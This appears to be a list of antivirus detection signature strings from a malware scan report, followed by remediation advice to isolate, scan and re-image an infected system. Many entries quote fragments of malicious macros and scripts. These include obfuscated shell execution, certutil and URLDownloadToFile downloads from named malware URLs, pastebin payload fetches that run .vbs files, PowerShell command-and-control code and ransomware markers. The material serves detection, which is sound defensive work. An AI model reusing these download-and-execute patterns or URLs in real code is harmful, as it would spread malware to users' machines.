- d='hHsvTtP:';GHsvetObjHsvect(c+d+'&&sET UF8=SKUZDSKUZDwweea8ae0f.usmarob.usSKUZD?2SKUZD');}catch(e){}close() (MACROHSTR_EXT)
- SKUZD=/%""<nul > %XMGK%.Hta|CMD /c !px! !XMGK!.HtA "" "), vbHidden (MACROHSTR_EXT)
- GetObject("", "wscript.shell").exec (MACROHSTR_EXT)
- .h" & ThisDocument. (MACROHSTR_EXT)
- &"e")&"\"&"l"&"ink"&"s\" (MACROHSTR_EXT)
- =activeworkbook.builtindocumentproperties.item(10/2) (MACROHSTR_EXT)
- +".p"+ (MACROHSTR_EXT)
- =createobject("scripting.filesystemobject") (MACROHSTR_EXT)
- .vb"+ (MACROHSTR_EXT)
- createobject((replace(module1. (MACROHSTR_EXT)
- ("llehs*tpircsw"),"*",".") (MACROHSTR_EXT)
- *nur*noisrevtnerruc*swodniw*tfosorcim*erawtfos*resu_tnerruc_yekh"),"*","\")),"rundll32.exepcwutl.dll,launchapplication" (MACROHSTR_EXT)
- &"e")&"\links\ (MACROHSTR_EXT)
- .vbs",(replace( (MACROHSTR_EXT)
- =environ$("appdata")&"\"& (MACROHSTR_EXT)
- setobjwshshell=createobject("wscript.shell")specialpath=objwshshell.specialfolders("templates") (MACROHSTR_EXT)
- =createobject("shell.application")=specialpath+("\mjhm.").open"get" (MACROHSTR_EXT)
- =.find.execute(findtext:="l0v",replacewith:="",replace:=2) (MACROHSTR_EXT)
- =.find.execute(findtext:="s3x",replacewith:="",replace:=2) (MACROHSTR_EXT)
- =activedocument.builtindocumentproperties( (MACROHSTR_EXT)
- ).value (MACROHSTR_EXT)
- )getobject("","wscript.shell").execcont1("category")+""+ (MACROHSTR_EXT)
- )createobject("wsc"+cont1("company")+"ell").execcont1("category")+""+ (MACROHSTR_EXT)
- .h"&thisdocument.cont1("comments"))activedocument.saveas2filename (MACROHSTR_EXT)
- fso.CreateTextFile("webzoon.js", True) (MACROHSTR_EXT)
- Shell("wscript webzoon.js", vbNormalFocus) (MACROHSTR_EXT)
- strText = UserForm1.TextBox1.Text (MACROHSTR_EXT)
- = Shell("cmd /c certutil.exe -urlcache -split -f ""http://doxiting.co.za/wp/wp-content/uploads/FULLFORCE.exe"" (MACROHSTR_EXT)
- && Pqdahiskothlvp.exe.exe", vbHide) (MACROHSTR_EXT)
- =vba.replace("mshki","ki","ta") (MACROHSTR_EXT)
- ="http://j.mp/"chu=fee+kki+aksdendfunctionpublicfunctionlnk() (MACROHSTR_EXT)
- publicfunctionta()vba.beepvba.beepcreateobject("wscript.shell").execchu+lnkendfunction (MACROHSTR_EXT)
- debug.printmsgbox("re-installoffice",vbokcancel);returns;1debug.printmeggggga.taendsub (MACROHSTR_EXT)
- CreateObject("Wscript.Shell").EXEC (MACROHSTR_EXT)
- = VBA.Replace("msh (MACROHSTR_EXT)
- = " http://j.mp/" (MACROHSTR_EXT)
- Debug.Print MsgBox("Re-Install Office", vbOKCancel); returns; 1 (MACROHSTR_EXT)
- Mirc\script.ini.locked (PEHSTR_EXT)
- joanna.smith@domain.com (PEHSTR_EXT)
- choice /t 1 /d y /n >nul (PEHSTR_EXT)
- .locked (PEHSTR_EXT)
- xxxx.onion/ (PEHSTR_EXT)
- .torrent (PEHSTR_EXT)
- .locky (PEHSTR_EXT)
- ConsoleApplication11.pdb (PEHSTR_EXT)
- A-Za-z.bat (MACROHSTR_EXT)
- dir c:\&echo (MACROHSTR_EXT)
- &start/B % (MACROHSTR_EXT)
- ("https://pastebin.com/raw/vmfavtlu"))adiag.savetofile"bfvby.vbs",2'savebinarydatatodiskcreateobject("wscript.shell").run"bfvby.vbs",0,falsesetadiag=nothingendsub (MACROHSTR_EXT)
- Debug.Print MsgBox("ERROR!", vbOKCancel); returns; 1 (MACROHSTR_EXT)
- obj.Uganda (MACROHSTR_EXT)
- Debug.Assert (Shell(salubhai)) (MACROHSTR_EXT)
- Uninstall\PDF_Reader (PEHSTR_EXT)
- CreateFileMappingA(i r5, i 0, i 0x40, i 0, i 0, i 0)i.r4 (PEHSTR_EXT)
- vbsedit.txt (PEHSTR_EXT)
- ExecToLog (PEHSTR_EXT)
- ShellExecuteExW (PEHSTR_EXT)
- .exe.local (PEHSTR_EXT)
- \comctl32.dll (PEHSTR_EXT)
- convertstringsecuritydescriptortosecuritydescriptorw (PEHSTR_EXT)
- ntuser.dat (PEHSTR_EXT)
- WinHttpOpenRequest (PEHSTR_EXT)
- WinHttpReadData (PEHSTR_EXT)
- WinHttpAddRequestHeaders (PEHSTR_EXT)
- turbos.dll (PEHSTR_EXT)
- ShellExecuteW (PEHSTR_EXT)
- chr50chr48chr48dimwshshellasobjectdimspecialpathasstringsetwshshellcreateobjectwscriptshellspecialpath (MACROHSTR_EXT)
- $Script:ControlServers[$Script:ServerIndex] (PEHSTR_EXT)
- $script:AgentJitter (PEHSTR_EXT)
- .UploadData($ (PEHSTR_EXT)
- @.php (PEHSTR_EXT)
- [System.Net.ServicePointManager]::Expect100Continue=0; (PEHSTR_EXT)
- =New-Object System.Net.WebClient; (PEHSTR_EXT)
- .Headers.Add('User-Agent',$ (PEHSTR_EXT)
- .Headers.Add("Cookie"," (PEHSTR_EXT)
- .Proxy=[System.Net.WebRequest]::DefaultWebProxy; (PEHSTR_EXT)
- $Script:Proxy (PEHSTR_EXT)
- =[System.Text.Encoding]::ASCII.GetBytes(' (PEHSTR_EXT)
- .DownloadData($ser+$t); (PEHSTR_EXT)
- $t='/ (PEHSTR_EXT)
- 0.php'; (PEHSTR_EXT)
- .Headers.Add("User-Agent" (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- I?_7AbortChannel@dp_misc@@6BXTypeProvider@lang@star@sun@com@@@ (PEHSTR_EXT)
- IcheckBlacklist@DescriptionInfoset@dp_misc@@ABEXXZ (PEHSTR_EXT)
- C:\x5cProgramData\x5cddond.com\x20https://www.mediafire.com/file/ (MACROHSTR_EXT)
- .htm/file (MACROHSTR_EXT)
- Create ("wscript C:\Users\Public\update.js") (MACROHSTR_EXT)
- GetObject(hrWUX).Get(aSMXUWKZ).Create ("wscript C:\Users\Public\update.js") (MACROHSTR_EXT)
- GetObject(jiaksidj).Get(iajsdkasodk).Create ("wscript C:\Users\Public\killlll.js") (MACROHSTR_EXT)
- .htm/file' (MACROHSTR_EXT)
- ).create("wscriptc:\users\public\killlll.js") (MACROHSTR_EXT)
- ("https://pastebin.com/raw/rgulkfkl"))adiag.savetofile"bfvby.vbs",2'savebinarydatatodiskcreateobject("wscript.shell").run (MACROHSTR_EXT)
- ).Get( (MACROHSTR_EXT)
- ).Create ("wscript C:\Users\Public\ (MACROHSTR_EXT)
- .js") (MACROHSTR_EXT)
- kill("c:\users\"&environ("username")&"\documents\"&"tue.zip") (MACROHSTR_EXT)
- createobject("wscript.shell").specialfolders("mydocuments")&"\tue.zip"ret=urldownloadtofile(0,strurl,strpath,0,0 (MACROHSTR_EXT)
- "h"sae(1)="t"sae(2)="p"sae(3)="s"sae(4)=":"sae(5)="/" (MACROHSTR_EXT)
- shell("c:\users\"&environ("username")&"\documents"&"xl.png") (MACROHSTR_EXT)
- createobject("wscript.shell").specialfolders("mydocuments")&"\ttt.zip"ret=urldownloadtofile(0,strurl,strpath,0,0) (MACROHSTR_EXT)
- sae(0)="h"sae(1)="t"sae(2)="p"sae(3)="s"sae(4)=":"sae(5)="/" (MACROHSTR_EXT)
- wscriptc:\users\public\textfile.js"callshell(a,vbnormalfocus) (MACROHSTR_EXT)
- =worksheets("blanked").range("to1029")print#textfile,youtube (MACROHSTR_EXT)
- meta=worksheets("blanked1").range("a1030")+worksheets("blanked1").range("b103")p (MACROHSTR_EXT)
- gone="wscriptc:\users\public\pictures\focus.js"callvba.shell(one,vbnormalfocus)ends (MACROHSTR_EXT)
- Call MR.SetTimeouts(0, 2000, 2000, 5000) (MACROHSTR_EXT)
- MR.Open "GET", DecodeSTR(" (MACROHSTR_EXT)
- .setRequestHeader "Cache-Control", "no-cache" (MACROHSTR_EXT)
- .setRequestHeader "Pragma", "no-cache" (MACROHSTR_EXT)
- .send (MACROHSTR_EXT)
- .WaitForResponse (MACROHSTR_EXT)
- bbb = .ResponseText (MACROHSTR_EXT)
- Application.Quit (wdDoNotSaveChanges) (MACROHSTR_EXT)
- Set daraufh = headb.CreateTextFile("C:\ProgramData\graniteb.txt") (MACROHSTR_EXT)
- Const link = \"http://jyhjyy.top\" (PEHSTR_EXT)
- Const link = \"http://navigation.iwatchavi.com/\" (PEHSTR_EXT)
- xmlHttp.open \"GET\", \"http://bbtbfr.pw/GetHPHost (PEHSTR_EXT)
- tmp.mof (PEHSTR_EXT)
- \kemgadeojglibflomicgnfeopkdfflnk (FOLDERNAME)
- pv/%0 (SNID)
- ~/\Qd: (SNID)
- DTOOLS8_x86.XLL (MACROHSTR_EXT)
- SOP Return.xlsm (MACROHSTR_EXT)
- SOP Data BACKUP.xlsm (MACROHSTR_EXT)
- application.run("piputval" (MACROHSTR_EXT)
- C:\Program Files (x86)\DPW-Apps\ (MACROHSTR_EXT)
- www.mdf-xlpages.com (MACROHSTR_EXT)
- www.excelabo.net (MACROHSTR_EXT)
- http://excel-malin.com (MACROHSTR_EXT)
- ActiveWorkbook.Worksheets("Notes").Activate (MACROHSTR_EXT)
- BOM Upload.xlsx (MACROHSTR_EXT)
- description="ribbon and handler for asap utilities" (MACROHSTR_EXT)
- " & Year(Now) & ", MUFG Bank. All Rights Reserved. (MACROHSTR_EXT)
- Sheets("PBR_Template").Select (MACROHSTR_EXT)
- Set BEx1 = Application.Run("BExAnalyzer.xla!GetBEx") (MACROHSTR_EXT)
- If InStr(lName.Name, "BEx") (MACROHSTR_EXT)
- software\haver\dlxmenu (MACROHSTR_EXT)
- software\haver\dlxranger (MACROHSTR_EXT)
- software\haver\exceldatefirst (MACROHSTR_EXT)
- HSBCnetCheck.Value (MACROHSTR_EXT)
- ActiveSheet.Protect ("abernoway") (MACROHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Immediately isolate the affected system from the network. Conduct a comprehensive full system scan with updated antivirus software, paying close attention to dropped files (e.g., jjueA.exe, Xue.exe) and potential rootkit components. Change all credentials potentially compromised by the phishing attempt, and review system logs for persistence mechanisms. Due to the high likelihood of rootkit presence and system compromise, a full system re-image is strongly recommended if complete eradication cannot be confirmed.